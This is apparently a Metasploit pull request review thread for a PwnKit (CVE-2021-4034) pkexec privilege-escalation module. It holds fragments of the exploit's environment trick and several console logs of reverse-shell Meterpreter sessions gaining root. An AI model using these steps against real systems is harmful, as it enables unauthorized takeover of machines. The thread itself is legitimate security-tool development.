pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
rapid7/metasploit-framework pull request #16103
Opened 2022-01-26 19:19 UTC by RootUp

## Summary

A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to  execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.

## Verification

* Start `msfconsole`
* Get a non-root shell/meterpreter
* use `exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec`
* set SESSION `<session-id>`
* set LHOST `<lhost-IP>`
* `run`

## Scenarios

```
msf6 exploit(multi/script/web_delivery) > 
[*] 172.16.30.21     web_delivery - Delivering Payload (497 bytes)
[*] Sending stage (39800 bytes) to 172.16.30.21
[*] Meterpreter session 1 opened (172.19.20.29:4444 -> 172.16.30.21:57038 ) at 2022-01-26 23:17:04 +0400

msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: zero
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > options 

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                   yes       The session to run this module on

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 172.19.20.29
LHOST => 172.19.20.29
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 172.19.20.29:5555 
[*] Writing '/tmp/.qwxijs' (282 bytes) ...
[*] Executing exploit '/tmp/.ciobixe'
[*] Sending stage (3012548 bytes) to 172.16.30.21
[+] Deleted /tmp/.qwxijs
[+] Deleted /tmp/.ciobixe
[*] Exploit result:

[*] Meterpreter session 2 opened (172.19.20.29:5555 -> 172.16.30.21:53512 ) at 2022-01-26 23:17:36 +0400

meterpreter > getuid
Server username: root
meterpreter > background 
[*] Backgrounding session 2...
```

2022-01-27 07:46 UTC, timwr commented on data/exploits/CVE-2021-4034/cve_2021_4034.c
> +	FILE *fp;
Wouldn't it make sense to move the contents of this file into the module itself?

2022-01-27 07:47 UTC, timwr commented
That was quick!
Confirmed working on Ubuntu 20.04.1:  `Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux`

2022-01-27 08:30 UTC, RootUp commented on data/exploits/CVE-2021-4034/cve_2021_4034.c
> +	FILE *fp;
Thank you Tim, for reviewing this. Ahem! I tried adding the file content to the module but couldn't make it not sure why maybe, I need time to debug it. So, decided to port in this way.

2022-01-27 20:54 UTC, RootUp commented on data/exploits/CVE-2021-4034/cve_2021_4034.c
> +	FILE *fp;
Thanks Jeffrey. So, I couldn't get the code complete working. I took some references from the past modules but was not able to implement the same. Hence, I had this version. If you can point me some other references, I can give a try again.

2022-01-28 05:09 UTC, bcoles commented on modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb
> +    result = cmd_exec("echo #{payload_file} | #{exploit_file}")
`payload_file` may contain spaces.

```suggestion
    result = cmd_exec("echo '#{payload_file}' | #{exploit_file}")
```

Also, should this be backgrounded? Meterpreter execution is blocking.

2022-01-28 05:09 UTC, bcoles commented on modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb
> +          users administrative rights on the target machine.
This is copied verbatim from the CVE description. The modules description should describe the vulnerability and methods used by the exploit. It should also describe tested/affected systems.

2022-01-28 05:09 UTC, bcoles commented on data/exploits/CVE-2021-4034/cve_2021_4034.c
> +	fp = fopen("pwnkit/pwnkit.c", "w");
The module should clean up these files and directories after exploitation. It should also check if they already exist before exploitation.

2022-01-28 07:02 UTC, bcoles commented
Here's a module which addresses many of my comments above. Although it is a bit old (doesn't use some of the new Post API methods)

* https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/servu_ftp_server_prepareinstallation_priv_esc.rb

It defines all architectures in `'arch'`.

It uses `AutoCheck` and contains a `check` method to check if the target executable exists and is setuid.

It exposes a module option to set the path to the setuid binary.

It uses `bash` to set `argv[0]`, although I'm not sure if this can be used to set `argv[0]` to `NULL`.

It checks if the working directory is writable.

2022-01-28 14:15 UTC, smcintyre-r7 requested changes
We'll need to compile the `data/exploits/CVE-2021-4034/cve_2021_4034` binary ourselves so if you could remove it that'd help us out. Thanks!

2022-01-28 14:15 UTC, smcintyre-r7 commented on data/exploits/CVE-2021-4034/cve_2021_4034.c
> +	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
It doesn't look like you'd even need to compile the contents of `shell` if I'm reading this correctly. So what that bit is doing is spawning a shell which is then reading form stdin to execute the ELF executable that Metasploit uploaded and dropped. Instead you can remove this layer of complexity by having Metasploit just upload and drop the shared object directly. I also see that it's necessary to call `setuid(0)` and similar. That can actually be handled by the payload itself by setting the `PrependSetuid` datastore option to true.

Going about it that way would involve fewer files and fewer steps for this exploit. At that point it may also be possible to implement the `execve` call that actually triggers the exploit through an interpreted language like Python in the event that the `gcc` compiler is unavailable and the precompiled binary doesn't work. Going about it that way could also remove the necessity to even write the exploit to disk.

2022-01-28 14:15 UTC, smcintyre-r7 commented on modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb
> +    upload_and_chmodx(payload_file, generate_payload_exe)
This is where the shared object should be uploaded directly to remove the need for the contents of `shell` to be compiled on the remote host. The function is `generate_payload_dll` (despite actually generating a `.so` file. You can see an example in the [sudo_baron_samedit](https://github.com/rapid7/metasploit-framework/blob/58d98207f17181a2367a59440542c58a71bd3232/modules/exploits/linux/local/sudo_baron_samedit.rb#L266) exploit.

2022-01-28 14:15 UTC, smcintyre-r7 commented on modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb
> +          'SideEffects' => [ ]
Needs to add `ARTIFACTS_ON_DISK` since you're doing quite a bit with the filesystem.

2022-01-30 08:52 UTC, hexcat commented on data/exploits/CVE-2021-4034/cve_2021_4034.c
> +	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
It looks like newer versions of polkit (for example, in Arch Linux) [set](https://gitlab.freedesktop.org/polkit/polkit/-/blob/539bf5dcca489534f42798a4500aca4b1a8ec8d0/src/programs/pkexec.c#L505) `GIO_USE_VFS` environment variable. It will cause the `envp[]` array to relocate in process memory if the variable is not defined. In this case, the write to `argv[1]` misses the `envp[]` and the exploit fails. See [link](https://github.com/v-rzh/CVE-2021-4034#whats-the-deal-with-gio_use_vfs).

The suggestion is to set the variable beforehand, so the size of the `envp[]` array doesn't change and the array is not relocated:
```suggestion
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", "GIO_USE_VFS=", NULL };
```

(It seems that the particular value of `GIO_USE_VFS` is irrelevant, so it can be omitted. I don't know whether `local` or any other value would improve stability on different platforms.)

2022-01-31 17:31 UTC, bwatters-r7 commented
I'd panned on writing a module for this exploit this week, so I'm going to try and get some suggestions out in a PR to this branch over the next day or two, if that works.

2022-02-07 20:39 UTC, bwatters-r7 commented
Just as an FYI, I have a module that does not require gcc, but it still needs serious cleanup and additional support, so I'm not even bothering to PR it to this branch right now.  It has way too many literals and silly things, but I wanted people to know it was possible and available.  It _might_ work on other targets, but I have not added the targets or tested them, yet.  I'll clean it up a bit, test it, then PR it to this branch.  In the meantime, here's the monstrosity: https://github.com/bwatters-r7/metasploit-framework/tree/land-16103

2022-02-18 22:35 UTC, bwatters-r7 commented
@RootUp that PR is ready to land in your branch, now.  Thanks!

2022-02-18 22:43 UTC, bwatters-r7 commented
So there's some interesting changes in here.  I had to add an aarch64 dynamically-linked library template, and because the directory containing the payload file is deleted while it is running, the payload will fail when you first run `sysinfo` because the `pwd` call causes an error, so I added a `OnSessionCmd` option that allows us to automatically execute a command when the session bootstraps.  In this case, we just run `cd /` but I was told this had been an issue before, so I just added it as a feature of all shell and meterpreter sessions.  I anticipate that option will be hotly debated 🔥

2022-02-19 17:52 UTC, RootUp commented
Thank you @bwatters-r7

**Tested against:** Linux ubuntu 5.4.0-47-generic


```
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 172.19.20.29:4442 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.yotansg
[+] The target is vulnerable.
[*] Writing '/tmp/.mletbbcocydc/prdvjvfzoxka/prdvjvfzoxka.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.mletbbcocydc
[*] Sending stage (3020772 bytes) to 172.16.30.21
[+] Deleted /tmp/.mletbbcocydc/prdvjvfzoxka/prdvjvfzoxka.so
[+] Deleted /tmp/.mletbbcocydc/.miffavaxim
[!] Attempting to delete working directory /tmp/.mletbbcocydc
[+] Deleted /tmp/.mletbbcocydc
[*] Meterpreter session 2 opened (172.19.20.29:4442 -> 172.16.30.21:40868 ) at 2022-02-19 21:50:20 +0400

meterpreter > 
meterpreter > getuid 
Server username: root
meterpreter > 
```

2022-03-02 18:31 UTC, smcintyre-r7 reviewed
Tested this successfully on Ubuntu 20.04. Just left a few minor comments, the docs need a bit of refactoring to render correctly and a suggested improvement for the path discovery.

2022-03-02 18:31 UTC, smcintyre-r7 commented on documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md
> +- polkit-0.115-12.el8
This should all be fixed to render properly in the markdown from `info -d`.

![image](https://user-images.githubusercontent.com/58950994/156424449-fe80a77c-e365-42a8-910c-8c7d9d2a03b0.png)

2022-03-02 18:31 UTC, smcintyre-r7 commented on documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md
> +- 20.04: 0.105-26ubuntu1.2
Pretty sure that `0.105-26ubuntu1.2` is the last vulnerable package on Ubuntu 20.04

```suggestion
- 20.04: 0.105-26ubuntu1.1
```

2022-03-02 18:31 UTC, smcintyre-r7 commented on modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb
> +  end
So I see that you do need the full path to the binary in order to check the setuid bit meaning that `command_exists?` is insufficient. How about using `which` to query the remote system and checking if the resulting path exists to remove any error messages. This should be faster since it'll query the remote system instead of iterating over each, as well as check all entries in the `PATH`.

```ruby
  def find_pkexec
    if exists?(pkexec = cmd_exec('which pkexec'))
      vprint_status("Found pkexec here: #{pkexec}")
      return pkexec
    end
    return nil
  end
```

2022-03-02 18:31 UTC, smcintyre-r7 commented on modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb
> +    cmd_exec("rm -rf #{working_dir}")
The `rm_rf` function should handle this automatically now that #13369 is closed. Alternatively if the working directory is registered for cleanup then it shouldn't be necessary to call this at all.

2022-03-02 20:02 UTC, bwatters-r7 commented on modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb
> +    cmd_exec("rm -rf #{working_dir}")
Right.... this is an artifact from before I fixed the working directories.  Automated cleanup fails if it is supposed to delete the cwd:

```
[*] Checking for pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.yrvyplpeb
[*] /tmp/.yrvyplpeb created
[*] Writing '/tmp/.yrvyplpeb/wzbuzxid/wzbuzxid.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.yrvyplpeb
[*] Running python3 /tmp/.yrvyplpeb/.uqstwahshmp /usr/bin/pkexec /tmp/.yrvyplpeb/wzbuzxid/wzbuzxid.so wzbuzxid gnwvzeifvsg
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 10.5.132.108
[+] Deleted /tmp/.djhgwiqtc/.knvsjtc
[+] Deleted /tmp/.yrvyplpeb/wzbuzxid/wzbuzxid.so
[+] Deleted /tmp/.yrvyplpeb/.uqstwahshmp
[!] Attempting to delete working directory /tmp/.yrvyplpeb
[!] Attempting to delete working directory /tmp/.yrvyplpeb
[*] Meterpreter session 4 opened (10.5.135.101:4444 -> 10.5.132.108:50470 ) at 2022-03-02 13:50:47 -0600
[-] Failed to delete /tmp/.djhgwiqtc: stdapi_fs_delete_dir: Operation failed: 1
[-] Failed to delete /tmp/.djhgwiqtc: stdapi_fs_delete_dir: Operation failed: 1
[!] Attempting to delete working directory /tmp/.yrvyplpeb
[-] Failed to delete /tmp/.yrvyplpeb: stdapi_fs_delete_dir: Operation failed: 1
[!] Attempting to delete working directory /tmp/.yrvyplpeb
[-] Failed to delete /tmp/.yrvyplpeb: stdapi_fs_delete_dir: Operation failed: 1

```

It is even worse if you use `rm_rf()` explicitly, as trying to delete your cwd results in an exception and no session:
```
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking for pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.105
[*] Determined host os is Ubuntu
[*] Polkit package version = 0.105-20ubuntu0.18.04.1
[*] Checking for pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.xkinqeruvw
[*] /tmp/.xkinqeruvw created
[!] Verify cleanup of /tmp/.xkinqeruvw
[*] Running python3 /tmp/.xkinqeruvw/.sojgilmfjpt /usr/bin/pkexec /tmp/.xkinqeruvw/ilrhqodql/ilrhqodql.so ilrhqodql vtiyvmfue
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “vtiyvmfue”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_fs_delete_dir: Operation failed: 1
[!] Attempting to delete working directory /tmp/.xkinqeruvw
[-] Failed to delete /tmp/.xkinqeruvw: stdapi_fs_delete_dir: Operation failed: 1
[!] Attempting to delete working directory /tmp/.xkinqeruvw
[-] Failed to delete /tmp/.xkinqeruvw: stdapi_fs_delete_dir: Operation failed: 1
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > 

```
I'll remove the `cmd_exec` line entirely, because now that we exit the directory we're deleting, automated cleanup works, but I'm going to try and remember this little edge case, because it is just the kind of thing that might bite us later.

2022-03-02 20:04 UTC, bwatters-r7 commented on documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md
> +- polkit-0.115-12.el8
That's annoying.... Rubymine renders that syntax as a list....
![image](https://user-images.githubusercontent.com/17987018/156440761-e5f76ac3-7e35-490c-8808-fb880ca2054e.png)

2022-03-02 20:09 UTC, bwatters-r7 commented on modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb
> +    cmd_exec("rm -rf #{working_dir}")
Oooof..... upon retest, this appears to create a race condition?  Sometimes, it looks like the cleanup gets called before the cd gets called:
```
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking for pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.105
[*] Determined host os is Ubuntu
[*] Polkit package version = 0.105-20ubuntu0.18.04.1
[*] Checking for pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.rwwwwph
[*] /tmp/.rwwwwph created
[!] Verify cleanup of /tmp/.rwwwwph
[*] Running python3 /tmp/.rwwwwph/.uyqwneamq /usr/bin/pkexec /tmp/.rwwwwph/csknejhw/csknejhw.so csknejhw yejapgx
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “yejapgx”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.
[+] The target is vulnerable.
[*] Checking for pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.bqgbixic
[*] /tmp/.bqgbixic created
[*] Writing '/tmp/.bqgbixic/rgszypzp/rgszypzp.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.bqgbixic
[*] Running python3 /tmp/.bqgbixic/.gidirgtycya /usr/bin/pkexec /tmp/.bqgbixic/rgszypzp/rgszypzp.so rgszypzp tfkyeevz
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 10.5.132.108
[+] Deleted /tmp/.rwwwwph/.uyqwneamq
[+] Deleted /tmp/.bqgbixic/rgszypzp/rgszypzp.so
[+] Deleted /tmp/.bqgbixic/.gidirgtycya
[!] Attempting to delete working directory /tmp/.bqgbixic
[!] Attempting to delete working directory /tmp/.bqgbixic
[*] Meterpreter session 7 opened (10.5.135.101:4444 -> 10.5.132.108:50878 ) at 2022-03-02 14:07:09 -0600
[-] Failed to delete /tmp/.rwwwwph: stdapi_fs_delete_dir: Operation failed: 1
[-] Failed to delete /tmp/.rwwwwph: stdapi_fs_delete_dir: Operation failed: 1
[-] Failed to delete /tmp/.bqgbixic: stdapi_fs_delete_dir: Operation failed: 1
[-] Failed to delete /tmp/.bqgbixic: stdapi_fs_delete_dir: Operation failed: 1

meterpreter > ls /tmp/.rwwwwph/
Listing: /tmp/.rwwwwph/
=======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040755/rwxr-xr-x  4096  dir   2022-03-02 13:57:31 -0600  GCONV_PATH=.
040755/rwxr-xr-x  4096  dir   2022-03-02 13:57:32 -0600  csknejhw

meterpreter > pwd
/
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.5.132.108 - Meterpreter session 7 closed.  Reason: Died
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > pwd
/home/msfuser
meterpreter > 
```
I'm going to leave that line in.

2022-03-02 20:28 UTC, bwatters-r7 commented on documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md
> +- 20.04: 0.105-26ubuntu1.2
This one's on my poor reading comprehension.  It appears these are the first patched versions, not last vulnerable, updating the docs accordingly.

2022-03-02 21:49 UTC, smcintyre-r7 commented on documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md
> +- polkit-0.115-12.el8
```suggestion
Last Vulnerable Ubuntu packages:

* 20.04: 0.105-26ubuntu1.2
* 21.10: 0.105-31ubuntu0.1
* 18.04: 0.105-20ubuntu0.18.04.6

Source: https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py

Last Vulnerable Debian Packages:

* stretch: 0.105-18+deb9u2
* buster: 0.105-25+deb10u1
* bullseye: 0.105-31+deb11u1

Source: https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py

Vulnerable ContOS Packages:

* polkit-0.112-5.ael7b
* polkit-0.112-13.p1.el7a
* polkit-0.96-2.el6
* polkit-0.96-2.el6_0.1
* polkit-0.96-5.el6_4
* polkit-0.96-7.el6
* polkit-0.96-7.el6_6.1
* polkit-0.96-11.el6
* polkit-0.96-11.el6_10.1
* polkit-0.112-1.el7
* polkit-0.112-5.el7
* polkit-0.112-6.el7_2
* polkit-0.112-7.el7_2.2
* polkit-0.112-7.el7_2.3
* polkit-0.112-7.el7_2
* polkit-0.112-9.el7
* polkit-0.112-11.el7_3
* polkit-0.112-12.el7_3
* polkit-0.112-12.el7_4.1
* polkit-0.112-14.el7
* polkit-0.112-14.el7_5.1
* polkit-0.112-17.el7
* polkit-0.112-18.el7
* polkit-0.112-18.el7_6.1
* polkit-0.112-18.el7_6.2
* polkit-0.112-22.el7
* polkit-0.112-22.el7_7.1
* polkit-0.112-26.el7
* polkit-0.115-6.el8
* polkit-0.115-9.el8
* polkit-0.115-9.el8_1.1
* polkit-0.115-11.el8
* polkit-0.115-11.el8_2.1
* polkit-0.115-11.el8_3.2
* polkit-0.115-11.el8_4.1
* polkit-0.115-12.el8
```

That fixes the rendering issue from `info -d`.

2022-03-02 23:28 UTC, bwatters-r7 commented on documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md
> +- polkit-0.115-12.el8
Through checking, it looks like rather than change from '-' to '*', all I needed to do was add a newline before the lists.

2022-03-03 14:16 UTC, smcintyre-r7 approved these changes
Changes have the module looking good and working as intended now!

<details>
<summary>Testing Output</summary>

```
msf6 exploit(multi/ssh/sshexec) > exploit
[*] SSH session 1 opened (192.168.159.128:46347 -> 192.168.159.27:22 ) at 2022-03-03 09:10:24 -0500

id
uid=1000(smcintyre) gid=1000(smcintyre) groups=1000(smcintyre),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare)
^Z
Background session 1? [y/N]  y
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit SESSION=-1 VERBOSE=true

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.105
[*] Determined host os is Ubuntu
[*] Polkit package version = 0.105-26ubuntu1.1
[*] Detected architecture: x86_64
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.zdihxh
[*] /tmp/.zdihxh created
[*] Max line length is 65537
[*] Writing 828 bytes in 1 chunks of 3073 bytes (octal-encoded), using printf
[!] Verify cleanup of /tmp/.zdihxh
[*] Running python /tmp/.zdihxh/.kcznvnsljaq /usr/bin/pkexec /tmp/.zdihxh/uunzptwfurxy/uunzptwfurxy.so uunzptwfurxy jjdkgsje
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “jjdkgsje”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.
[+] The target is vulnerable.
[*] Detected architecture: x86_64
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.yygyiogjedq
[*] /tmp/.yygyiogjedq created
[*] Writing '/tmp/.yygyiogjedq/aehdezgyo/aehdezgyo.so' (548 bytes) ...
[*] Max line length is 65537
[*] Writing 548 bytes in 1 chunks of 1380 bytes (octal-encoded), using printf
[*] Max line length is 65537
[*] Writing 828 bytes in 1 chunks of 3073 bytes (octal-encoded), using printf
[!] Verify cleanup of /tmp/.yygyiogjedq
[*] Running python /tmp/.yygyiogjedq/.kliugrvzwzi /usr/bin/pkexec /tmp/.yygyiogjedq/aehdezgyo/aehdezgyo.so aehdezgyo meymddk
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.159.27
[+] Deleted /tmp/.yygyiogjedq/aehdezgyo/aehdezgyo.so
[+] Deleted /tmp/.yygyiogjedq/.kliugrvzwzi
[!] Attempting to delete working directory /tmp/.yygyiogjedq
[!] Attempting to delete working directory /tmp/.yygyiogjedq
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.27:53264 ) at 2022-03-03 09:11:26 -0500


meterpreter > 
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.159.27
OS           : Ubuntu 20.04 (Linux 5.11.0-40-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/
meterpreter >
```
</details>

2022-03-03 14:24 UTC, merged

2022-03-03 14:25 UTC, smcintyre-r7 commented
# Release Notes
This adds an LPE exploit for CVE-2021-4034 which leverages a flaw in polkit's pkexec utility. It also adds support to Metasploit for generating Linux SO library payloads in the AARCH64 architecture.